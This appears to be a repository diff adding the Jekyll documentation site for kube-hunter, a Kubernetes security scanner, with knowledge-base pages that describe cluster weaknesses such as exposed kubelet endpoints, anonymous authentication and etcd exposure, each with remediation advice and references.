jekyll (~> 3.3)
jekyll-remote-theme (0.4.0)
addressable (~> 2.0)
jekyll (~> 3.5)
rubyzip (>= 1.2.1, < 3.0)
jekyll-sass-converter (1.5.2)
sass (~> 3.4)
jekyll-seo-tag (2.5.0)
jekyll (~> 3.3)
jekyll-sitemap (1.2.0)
jekyll (~> 3.3)
jekyll-swiss (0.4.0)
jekyll-theme-architect (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-cayman (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-dinky (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-hacker (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-leap-day (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-merlot (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-midnight (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-minimal (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-modernist (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-primer (0.5.3)
jekyll (~> 3.5)
jekyll-github-metadata (~> 2.9)
jekyll-seo-tag (~> 2.0)
jekyll-theme-slate (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-tactile (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-time-machine (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-titles-from-headings (0.5.1)
jekyll (~> 3.3)
jekyll-watch (2.2.1)
listen (~> 3.0)
jemoji (0.10.2)
gemoji (~> 3.0)
html-pipeline (~> 2.2)
jekyll (~> 3.0)
kramdown (1.17.0)
liquid (4.0.0)
listen (3.1.5)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
ruby_dep (~> 1.2)
mercenary (0.3.6)
mini_portile2 (2.4.0)
minima (2.5.0)
jekyll (~> 3.5)
jekyll-feed (~> 0.9)
jekyll-seo-tag (~> 2.1)
minitest (5.12.2)
multipart-post (2.1.1)
nokogiri (1.10.8)
mini_portile2 (~> 2.4.0)
octokit (4.14.0)
sawyer (~> 0.8.0, >= 0.5.3)
pathutil (0.16.2)
forwardable-extended (~> 2.6)
public_suffix (3.1.1)
rb-fsevent (0.10.3)
rb-inotify (0.10.0)
ffi (~> 1.0)
rouge (3.11.0)
ruby-enum (0.7.2)
i18n
ruby_dep (1.5.0)
rubyzip (2.0.0)
safe_yaml (1.0.5)
sass (3.7.4)
sass-listen (~> 4.0.0)
sass-listen (4.0.0)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
sawyer (0.8.2)
addressable (>= 2.3.5)
faraday (> 0.8, < 2.0)
terminal-table (1.8.0)
unicode-display_width (~> 1.1, >= 1.1.1)
thread_safe (0.3.6)
typhoeus (1.3.1)
ethon (>= 0.9.0)
tzinfo (1.2.5)
thread_safe (~> 0.1)
unicode-display_width (1.6.0)
PLATFORMS
ruby
DEPENDENCIES
github-pages
jekyll-sitemap
BUNDLED WITH
1.17.2

19
docs/_config.yml Normal file
View File

@@ -0,0 +1,19 @@
title: kube-hunter
description: Kube-hunter hunts for security weaknesses in Kubernetes clusters
logo: https://raw.githubusercontent.com/aquasecurity/kube-hunter/master/kube-hunter.png
show_downloads: false
google_analytics: UA-63272154-1
theme: jekyll-theme-minimal
collections:
kb:
output: true
defaults:
-
scope:
path: "" # an empty string here means all files in the project
values:
layout: "default"
url: "https://aquasecurity.github.io/kube-hunter"
plugins:
- jekyll-sitemap

21
docs/_kb/KHV002.md Normal file
View File

@@ -0,0 +1,21 @@
---
vid: KHV002
title: Kubernetes version disclosure
categories: [Information Disclosure]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The fact that your infrastructure is using Kubernetes, and the specific version of Kubernetes used is publicly available, and could be used by an attacker to target your environment with known vulnerabilities in the specific version of Kubernetes you are using.
This information could have been obtained from the Kubernetes API `/version` endpoint, or from the Kubelet's `/metrics` debug endpoint.
## Remediation
Disable `--enable-debugging-handlers` kubelet flag.
## References
- [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
- [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)

20
docs/_kb/KHV003.md Normal file
View File

@@ -0,0 +1,20 @@
---
vid: KHV003
title: Azure Metadata Exposure
categories: [Information Disclosure]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
Microsoft Azure provides an internal HTTP endpoint that exposes information from the cloud platform to workloads running in a VM. The endpoint is accessible to every workload running in the VM. An attacker that is able to execute a pod in the cluster may be able to query the metadata service and discover additional information about the environment.
## Remediation
Consider using AAD Pod Identity. A Microsoft project that allows scoping the identity of workloads to Kubernetes Pods instead of VMs (instances).
## References
- [Azure Instance Metadata service](https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service)
- [AAD Pod Identity](https://github.com/Azure/aad-pod-identity#demo)

24
docs/_kb/KHV004.md Normal file
View File

@@ -0,0 +1,24 @@
---
vid: KHV004
title: Azure SPN Exposure
categories: [Identity Theft]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
Kubernetes has native integration with Microsoft Azure, for that a Kubernetes installation on Azure will require API access to manage the cluster's resources in Azure (for example, to create a cloud load balancer). Some installations of Kubernetes on Azure rely on a shared file on the node that contains credentials to the Azure API under `/etc/kubernetes/azure.json`. A Pod with access to this file may become a gateway for an attacker to control your Azure environment.
## Remediation
The better solution would be to use Azure Managed Identities instead of a static SPN. However this functionality is not mature yet, and is currently available in alpha stage only for aks-engine (non-managed Kubernetes).
You can update or rotate the cluster SPN credentials, in order to prevent leaked credentials to persist over time.
## References
- [Service principals with Azure Kubernetes Service (AKS)](https://github.com/MicrosoftDocs/azure-docs/blob/master/articles/aks/kubernetes-service-principal.md)
- [What is managed identities for Azure resources?](https://docs.microsoft.com/en-us/azure/active-directory/managed-identities-azure-resources/overview)
- [aks-engine Features - Managed Identity](https://github.com/Azure/aks-engine/blob/master/docs/topics/features.md#managed-identity)
- [Update or rotate the credentials for a service principal in Azure Kubernetes Service (AKS)](https://github.com/MicrosoftDocs/azure-docs/blob/master/articles/aks/update-credentials.md)

24
docs/_kb/KHV005.md Normal file
View File

@@ -0,0 +1,24 @@
---
vid: KHV005
title: Access to Kubernetes API
categories: [Information Disclosure, Unauthenticated Access]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
Kubernetes API was accessed with Pod Service Account or without Authentication (see report message for details).
## Remediation
Secure access to your Kubernetes API.
It is recommended to explicitly specify a Service Account for all of your workloads (`serviceAccountName` in `Pod.Spec`), and manage their permissions according to the least privilege principal.
Consider opting out automatic mounting of SA token using `automountServiceAccountToken: false` on `ServiceAccount` resource or `Pod.spec`.
## References
- [Configure Service Accounts for Pods](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)

23
docs/_kb/KHV006.md Normal file
View File

@@ -0,0 +1,23 @@
---
vid: KHV006
title: Insecure (HTTP) access to Kubernetes API
categories: [Unauthenticated Access]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The API Server port is accessible over plain HTTP, and therefore unencrypted and potentially insecured.
## Remediation
Ensure your setup is exposing kube-api only on an HTTPS port.
Do not enable kube-api's `--insecure-port` flag in production.
## References
- [API Server Ports and IPs](https://kubernetes.io/docs/reference/access-authn-authz/controlling-access/#api-server-ports-and-ips)
- [kube-apiserver command reference](https://kubernetes.io/docs/reference/command-line-tools-reference/kube-apiserver/)

20
docs/_kb/KHV007.md Normal file
View File

@@ -0,0 +1,20 @@
---
vid: KHV007
title: Specific Access to Kubernetes API
categories: [Access Risk]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
kube-hunter was able to perform the action specified by the reported vulnerability (check the report for more information). This may or may not be a problem, depending on your cluster setup and preferences.
## Remediation
Review the RBAC permissions to Kubernetes API server for the anonymous and default service account.
## References
- [Using RBAC Authorization](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)
- [KHV005 - Access to Kubernetes API]({{ site.baseurl }}{% link _kb/KHV005.md %})

20
docs/_kb/KHV020.md Normal file
View File

@@ -0,0 +1,20 @@
---
vid: KHV020
title: Possible Arp Spoof
categories: [IdentityTheft]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
When using a basic (but common) container networking in the cluster, containers on the same host are bridged togeather to form a virtual layer 2 network. This setup, which is also common for Kubernetes installations. What's also common in Kubernetes installations, is that the `NET_RAW` capability is granted to Pods, allowing them low level access to network interactions. By pairing these two issues together, a malicious Pod running on the cluster could abusing the ARP protocol (used to discover MAC address by IP) in order to spoof the IP address of another pod on same node, thus making other pods on the node talk to the attacker's Pod instead of the legitimate Pod.
## Remediation
Consider dropping the `NET_RAW` capability from your pods using `Pod.spec.securityContext.capabilities`
## References
- [DNS Spoofing on Kubernetes Clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters)
- [Configure a Security Context for a Pod or Container](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)

15
docs/_kb/KHV021.md Normal file
View File

@@ -0,0 +1,15 @@
---
vid: KHV021
title: Certificate Includes Email Address
categories: [Information Disclosure]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The Kubernetes API Server advertises a public certificate for TLS. This certificate includes an email address, that may provide additional information for an attacker on your organization, or be abused for further email based attacks.
## Remediation
Do not include email address in the Kubernetes API server certificate. (You should continue to use certificates to secure the API Server!)

19
docs/_kb/KHV022.md Normal file
View File

@@ -0,0 +1,19 @@
---
vid: KHV022
title: Critical Privilege Escalation CVE
categories: [Privilege Escalation]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
Cluster is found to be vulnerable to CVE-2018-1002105. Please see the Vulnerability description for additional information.
## Remediation
Please see the Vulnerability description for remediation.
## References
- [Severe Privilege Escalation Vulnerability in Kubernetes (CVE-2018-1002105)](https://blog.aquasec.com/kubernetes-security-cve-2018-1002105)

19
docs/_kb/KHV023.md Normal file
View File

@@ -0,0 +1,19 @@
---
vid: KHV023
title: Denial of Service to Kubernetes API Server
categories: [Denial Of Service]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
Cluster is found to be vulnerable to CVE-2019-1002100. Please see the Vulnerability description for additional information.
## Remediation
Please see the Vulnerability description for remediation.
## References
- [Kubernetes API Server Patch DoS Vulnerability (CVE-2019-1002100)](https://blog.aquasec.com/kubernetes-vulnerability-cve-2019-1002100)

20
docs/_kb/KHV024.md Normal file
View File

@@ -0,0 +1,20 @@
---
vid: KHV024
title: Possible Ping Flood Attack
categories: [Denial Of Service]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
Cluster is found to be vulnerable to CVE-2019-9512. Please see the Vulnerability description for additional information.
## Remediation
Please see the Vulnerability description for remediation.
## References
- [HTTP/2 Denial of Service Advisory](https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-002.md)
- [CVE-2019-9512](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9512)

20
docs/_kb/KHV025.md Normal file
View File

@@ -0,0 +1,20 @@
---
vid: KHV025
title: Possible Reset Flood Attack
categories: [Denial Of Service]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
Cluster is found to be vulnerable to CVE-2019-9514. Please see the Vulnerability description for additional information.
## Remediation
Please see the Vulnerability description for remediation.
## References
- [HTTP/2 Denial of Service Advisory](https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-002.md)
- [CVE-2019-9514](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9514)

20
docs/_kb/KHV026.md Normal file
View File

@@ -0,0 +1,20 @@
---
vid: KHV026
title: Arbitrary Access To Cluster Scoped Resources
categories: [PrivilegeEscalation]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
Cluster is found to be vulnerable to CVE-2019-11247. Please see the Vulnerability description for additional information.
## Remediation
Please see the Vulnerability description for remediation.
## References
- [CVE-2019-11247: API server allows access to custom resources via wrong scope](https://github.com/kubernetes/kubernetes/issues/80983)
- [CVE-2019-11247](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11247)

19
docs/_kb/KHV027.md Normal file
View File

@@ -0,0 +1,19 @@
---
vid: KHV027
title: Kubectl Vulnerable To CVE-2019-11246
categories: [Remote Code Execution]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
Kubectl is found to be vulnerable to CVE-2019-11246. Please see the Vulnerability description for additional information.
## Remediation
Please see the Vulnerability description for remediation.
## References
- [CVE-2019-11246: Another kubectl Path Traversal Vulnerability Disclosed](https://blog.aquasec.com/kubernetes-security-kubectl-cve-2019-11246)

20
docs/_kb/KHV028.md Normal file
View File

@@ -0,0 +1,20 @@
---
vid: KHV028
title: Kubectl Vulnerable To CVE-2019-1002101
categories: [Remote Code Execution]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
Kubectl is found to be vulnerable to CVE-2019-1002101. Please see the Vulnerability description for additional information.
## Remediation
Please see the Vulnerability description for remediation.
## References
- [CVE-2019-1002101](https://nvd.nist.gov/vuln/detail/CVE-2019-1002101)
- [Another kubectl Path Traversal Vulnerability Disclosed](https://blog.aquasec.com/kubernetes-security-kubectl-cve-2019-11246)

15
docs/_kb/KHV029.md Normal file
View File

@@ -0,0 +1,15 @@
---
vid: KHV029
title: Dashboard Exposed
categories: [Remote Code Execution]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
An open Kubernetes Dashboard was detected. The Kubernetes Dashboard can be used by an attacker to learn about the cluster and potentially to create new resources.
## Remediation
Do not leave the Dashboard insecured.

23
docs/_kb/KHV030.md Normal file
View File

@@ -0,0 +1,23 @@
---
vid: KHV030
title: Possible DNS Spoof
categories: [Identity Theft]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
Your Kubernetes DNS setup is vulnerable to spoofing attacks which impersonate your DNS for malicious purposes.
In this case the exploited vulnerability was ARP spoofing, but other methods could be used as well.
## Remediation
Consider using DNS over TLS. CoreDNS (the common DNS server for Kubernetes) supports this out of the box, but your client applications might not.
## References
- [DNS Spoofing on Kubernetes Clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters)
- [KHV020 - Possible Arp Spoof]({{ site.baseurl }}{% link _kb/KHV020.md %})
- [CoreDNS DNS over TLS](https://coredns.io/manual/toc/#specifying-a-protocol)
- [DNS over TLS spec](https://tools.ietf.org/html/rfc7858)

20
docs/_kb/KHV031.md Normal file
View File

@@ -0,0 +1,20 @@
---
vid: KHV031
title: Etcd Remote Write Access Event
categories: [Remote Code Execution]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
Etcd (Kubernetes' Database) is writable without authentication. This gives full control of your Kubernetes cluster to an attacker with access to etcd.
## Remediation
Ensure your etcd is accepting connections only from the Kubernetes API, using the `--trusted-ca-file` etcd flag. This is usually done by the installer, or cloud platform.
## References
- [etcd - Transport security model](https://etcd.io/docs/v3.4.0/op-guide/security/)
- [Operating etcd clusters for Kubernetes - Securing etcd clusters](https://kubernetes.io/docs/tasks/administer-cluster/configure-upgrade-etcd/#securing-etcd-clusters)

20
docs/_kb/KHV032.md Normal file
View File

@@ -0,0 +1,20 @@
---
vid: KHV032
title: Etcd Remote Read Access Event
categories: [Access Risk]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
Etcd (Kubernetes' Database) is accessible without authentication. This exposes the entire state of your Kubernetes cluster to the reader.
## Remediation
Ensure your etcd is accepting connections only from the Kubernetes API, using the `--trusted-ca-file` etcd flag. This is usually done by the installer, or cloud platform.
## References
- [etcd - Transport security model](https://etcd.io/docs/v3.4.0/op-guide/security/)
- [Operating etcd clusters for Kubernetes - Securing etcd clusters](https://kubernetes.io/docs/tasks/administer-cluster/configure-upgrade-etcd/#securing-etcd-clusters)

12
docs/_kb/KHV033.md Normal file
View File

@@ -0,0 +1,12 @@
---
vid: KHV033
title: Etcd Remote version disclosure
categories: [Information Disclosure]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The fact that your infrastructure is using etcd, and the specific version of etcd used is publicly available, and could be used by an attacker to target your environment with known vulnerabilities in the specific version of etcd you are using.

20
docs/_kb/KHV034.md Normal file
View File

@@ -0,0 +1,20 @@
---
vid: KHV034
title: Etcd is accessible using insecure connection (HTTP)
categories: [Unauthenticated Access]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The etcd server (Kubernetes database) port is accessible over plain HTTP, and therefore unencrypted and potentially insecured.
## Remediation
Ensure your setup is exposing etcd only on an HTTPS port by using the etcd flags `--key-file` and `--cert-file`.
## References
- [etcd - Transport security model](https://etcd.io/docs/v3.4.0/op-guide/security/)
- [Operating etcd clusters for Kubernetes - Securing etcd clusters](https://kubernetes.io/docs/tasks/administer-cluster/configure-upgrade-etcd/#securing-etcd-clusters)

19
docs/_kb/KHV036.md Normal file
View File

@@ -0,0 +1,19 @@
---
vid: KHV036
title: Anonymous Authentication
categories: [Remote Code Execution]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The kubelet is configured to allow anonymous (unauthenticated) requests to it's HTTP api. This may expose certein information, and capabilities to an attacker with access to the kubelet API.
## Remediation
Ensure kubelet is protected using `--anonymous-auth=false` kubelet flag. Allow only legitimate users using `--client-ca-file` or `--authentication-token-webhook` kubelet flags. This is usually done by the installer or cloud provider.
## References
- [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/)

21
docs/_kb/KHV037.md Normal file
View File

@@ -0,0 +1,21 @@
---
vid: KHV037
title: Exposed Container Logs
categories: [Information Disclosure]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The kubelet is leaking container logs via the `/containerLogs` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
## Remediation
Disable `--enable-debugging-handlers` kubelet flag.
## References
- [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
- [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)

21
docs/_kb/KHV038.md Normal file
View File

@@ -0,0 +1,21 @@
---
vid: KHV038
title: Exposed Running Pods
categories: [Information Disclosure]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The kubelet is leaking information about running pods via the `/runningpods` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
## Remediation
Disable `--enable-debugging-handlers` kubelet flag.
## References
- [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
- [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)

20
docs/_kb/KHV039.md Normal file
View File

@@ -0,0 +1,20 @@
---
vid: KHV039
title: Exposed Exec On Container
categories: [Remote Code Execution]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
An attacker could run arbitrary commands on a container via the kubelet's `/exec` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
## Remediation
Disable `--enable-debugging-handlers` kubelet flag.
## References
- [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
- [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)

20
docs/_kb/KHV040.md Normal file
View File

@@ -0,0 +1,20 @@
---
vid: KHV040
title: Exposed Run Inside Container
categories: [Remote Code Execution]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
An attacker could run arbitrary commands on a container via the kubelet's `/run` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
## Remediation
Disable `--enable-debugging-handlers` kubelet flag.
## References
- [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
- [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)

20
docs/_kb/KHV041.md Normal file
View File

@@ -0,0 +1,20 @@
---
vid: KHV041
title: Exposed Port Forward
categories: [Remote Code Execution]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
An attacker could read and write data from a pod via the kubelet's `/portForward` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
## Remediation
Disable `--enable-debugging-handlers` kubelet flag.
## References
- [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
- [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)

20
docs/_kb/KHV042.md Normal file
View File

@@ -0,0 +1,20 @@
---
vid: KHV042
title: Exposed Attaching To Container
categories: [Remote Code Execution]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
An attacker could attach to a running container via a websocket on the kubelet's `/attach` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
## Remediation
Disable `--enable-debugging-handlers` kubelet flag.
## References
- [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
- [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)

20
docs/_kb/KHV043.md Normal file
View File

@@ -0,0 +1,20 @@
---
vid: KHV043
title: Cluster Health Disclosure
categories: [Information Disclosure]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The kubelet is leaking it's health information, which may contain sensitive information, via the `/healthz` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
## Remediation
Disable `--enable-debugging-handlers` kubelet flag.
## References
- [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
- [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)

22
docs/_kb/KHV044.md Normal file
View File

@@ -0,0 +1,22 @@
---
vid: KHV044
title: Privileged Container
categories: [Access Risk]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
A privileged container is given access to all devices on the host and can work at the kernel level. It is declared using the `Pod.spec.containers[].securityContext.privileged` attribute. This may be useful for infrastructure containers that perform setup work on the host, but is a dangerous attack vector.
## Remediation
Minimize the use of privileged containers.
Use Pod Security Policies to enforce using `privileged: false` policy.
## References
- [Privileged mode for pod containers](https://kubernetes.io/docs/concepts/workloads/pods/pod/#privileged-mode-for-pod-containers)
- [Pod Security Policies - Privileged](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privileged)

20
docs/_kb/KHV045.md Normal file
View File

@@ -0,0 +1,20 @@
---
vid: KHV045
title: Exposed System Logs
categories: [Information Disclosure]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The kubelet is leaking system logs via the `/logs` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
## Remediation
Disable `--enable-debugging-handlers` kubelet flag.
## References
- [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
- [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)

20
docs/_kb/KHV046.md Normal file
View File

@@ -0,0 +1,20 @@
---
vid: KHV046
title: Exposed Kubelet Cmdline
categories: [Information Disclosure]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
When the Kubelet is run in debug mode, a Pod running in the cluster is able to access the Kubelet's `debug/pprof/cmdline` endpoint and examine how the kubelet was executed on the node, specifically the command line flags that were used, which tells the attacker about what capabilities the kubelet has which might be exploited.
## Remediation
Disable `--enable-debugging-handlers` kubelet flag.
## References
- [cmdline handler in Kubelet code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go#L327)
- [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)

27
docs/_kb/KHV047.md Normal file
View File

@@ -0,0 +1,27 @@
---
vid: KHV047
title: Pod With Mount To /var/log
categories: [Privilege Escalation]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
Kubernetes uses `/var/log/pods` on nodes to store Pods log files. When running `kubectl logs` the kubelet is fetching the pod logs from that directory. If a container has write access to `/var/log` it can create arbitrary files, or symlink to other files on the host. Those would be read by the kubelet when a user executes `kubectl logs`.
## Remediation
Consider disallowing running as root:
Using Kubernetes Pod Security Policies with `MustRunAsNonRoot` policy.
Aqua users can use a Runtime Policy with `Volume Blacklist`.
Consider disallowing writable host mounts to `/var/log`:
Using Kubernetes Pod Security Policies with `AllowedHostPaths` policy.
Aqua users can use a Runtime Policy with `Blacklisted OS Users and Groups`.
## References
- [Kubernetes Pod Escape Using Log Mounts](https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts)
- [Pod Security Policies - Volumes and file systems](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#volumes-and-file-systems)
- [Pod Security Policies - Users and groups](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#users-and-groups)

21
docs/_kb/KHV049.md Normal file
View File

@@ -0,0 +1,21 @@
---
vid: KHV049
title: kubectl proxy Exposed
categories: [Information Disclosure]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
An open kubectl proxy was detected. `kubectl proxy` is a convenient tool to connect from a local machine into an application running in Kubernetes or to the Kubernetes API. This is common practice to browse for example the Kubernetes dashboard. Leaving an open proxy can be exploited by an attacker to gain access into your entire cluster.
## Remediation
Expose your applications in a permanent, legitimate way, such as via Ingress.
Close open proxies immediately after use.
## References
- [Accessing Clusters - Using kubectl proxy](https://kubernetes.io/docs/tasks/access-application-cluster/access-cluster/#using-kubectl-proxy)

22
docs/_kb/KHV050.md Normal file
View File

@@ -0,0 +1,22 @@
---
vid: KHV050
title: Read access to Pod service account token
categories: [Access Risk]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
Every Pod in Kubernetes is associated with a Service Account which by default has access to the Kubernetes API. This access is made available to Pods by an auto-generated token that is made available to the Pod by Kubernetes. An attacker with access to a Pod can read the token and access the Kubernetes API.
## Remediation
It is recommended to explicitly specify a Service Account for all of your workloads (`serviceAccountName` in `Pod.Spec`), and manage their permissions according to the least privilege principle.
Consider opting out automatic mounting of SA token using `automountServiceAccountToken: false` on `ServiceAccount` resource or `Pod.spec`.
## References
- [Configure Service Accounts for Pods](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)

40
docs/_kb/KHV051.md Normal file
View File

@@ -0,0 +1,40 @@
---
vid: KHV051
title: Exposed Existing Privileged Containers Via Secure Kubelet Port
categories: [Access Risk]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The kubelet is configured to allow anonymous (unauthenticated) requests to its HTTPs API. This may expose certain information and capabilities to an attacker with access to the kubelet API.
A privileged container is given access to all devices on the host and can work at the kernel level. It is declared using the `Pod.spec.containers[].securityContext.privileged` attribute. This may be useful for infrastructure containers that perform setup work on the host, but is a dangerous attack vector.
Furthermore, if the kubelet **and** the API server authentication mechanisms are (mis)configured such that anonymous requests can execute commands via the API within the containers (specifically privileged ones), a malicious actor can leverage such capabilities to do way more damage in the cluster than expected: e.g. start/modify process on host.
## Remediation
Ensure kubelet is protected using `--anonymous-auth=false` kubelet flag. Allow only legitimate users using `--client-ca-file` or `--authentication-token-webhook` kubelet flags. This is usually done by the installer or cloud provider.
Minimize the use of privileged containers.
Use Pod Security Policies to enforce using `privileged: false` policy.
Review the RBAC permissions to Kubernetes API server for the anonymous and default service account, including bindings.
Ensure node(s) runs active filesystem monitoring.
Set `--insecure-port=0` and remove `--insecure-bind-address=0.0.0.0` in the Kubernetes API server config.
Remove `AlwaysAllow` from `--authorization-mode` in the Kubernetes API server config. Alternatively, set `--anonymous-auth=false` in the Kubernetes API server config; this will depend on the API server version running.
## References
- [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/)
- [Privileged mode for pod containers](https://kubernetes.io/docs/concepts/workloads/pods/pod/#privileged-mode-for-pod-containers)
- [Pod Security Policies - Privileged](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privileged)
- [Using RBAC Authorization](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)
- [KHV005 - Access to Kubernetes API]({{ site.baseurl }}{% link _kb/KHV005.md %})
- [KHV036 - Anonymous Authentication]({{ site.baseurl }}{% link _kb/KHV036.md %})

23
docs/_kb/KHV052.md Normal file
View File

@@ -0,0 +1,23 @@
---
vid: KHV052
title: Exposed Pods
categories: [Information Disclosure]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
An attacker could view sensitive information about pods that are bound to a Node using the exposed /pods endpoint
This can be done either by accessing the readonly port (default 10255), or from the secure kubelet port (10250)
## Remediation
Ensure kubelet is protected using `--anonymous-auth=false` kubelet flag. Allow only legitimate users using `--client-ca-file` or `--authentication-token-webhook` kubelet flags. This is usually done by the installer or cloud provider.
Disable the readonly port by using `--read-only-port=0` kubelet flag.
## References
- [Kubelet configuration](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/)
- [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/)

102
docs/_layouts/default.html Normal file
View File

@@ -0,0 +1,102 @@
<!DOCTYPE html>
<html lang="{{ site.lang | default: "en-US" }}">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
{% seo %}
<link rel="stylesheet" href="{{ "/assets/css/style.css?v=" | append: site.github.build_revision | relative_url }}">
